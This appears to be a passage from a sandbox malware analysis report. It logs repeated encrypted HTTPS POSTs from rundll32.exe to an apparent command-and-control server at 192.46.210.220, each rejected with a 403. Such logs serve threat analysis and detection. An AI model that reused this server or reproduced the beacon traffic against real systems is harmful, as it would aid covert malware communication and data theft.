                                                                                                      2021-10-28 03:08:55 UTC289OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:56 UTC299INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:56 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      59192.168.2.450073192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:55 UTC294OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:08:55 UTC294OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:56 UTC299INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:56 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      6192.168.2.449809192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:14 UTC29OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:07:14 UTC30OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:14 UTC39INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:07:14 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      60192.168.2.450090192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:59 UTC299OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:08:59 UTC299OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:00 UTC309INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:00 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      61192.168.2.450091192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:00 UTC304OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:00 UTC304OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:00 UTC309INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:00 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      62192.168.2.450106192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:03 UTC309OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:03 UTC309OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:04 UTC319INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:04 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      63192.168.2.450107192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:03 UTC314OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:03 UTC314OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:04 UTC319INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:04 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      64192.168.2.450114192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:07 UTC319OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:07 UTC319OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:08 UTC329INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:08 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      65192.168.2.450115192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:07 UTC324OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:07 UTC324OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:08 UTC329INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:08 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      66192.168.2.450122192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:11 UTC329OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:11 UTC329OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:12 UTC339INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:12 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      67192.168.2.450123192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:11 UTC334OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:11 UTC334OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:12 UTC339INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:12 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      68192.168.2.450130192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:15 UTC339OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:15 UTC339OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:16 UTC349INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:16 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      69192.168.2.450131192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:15 UTC344OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:15 UTC344OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:09:16 UTC349INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:16 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      7192.168.2.449810192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:14 UTC34OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
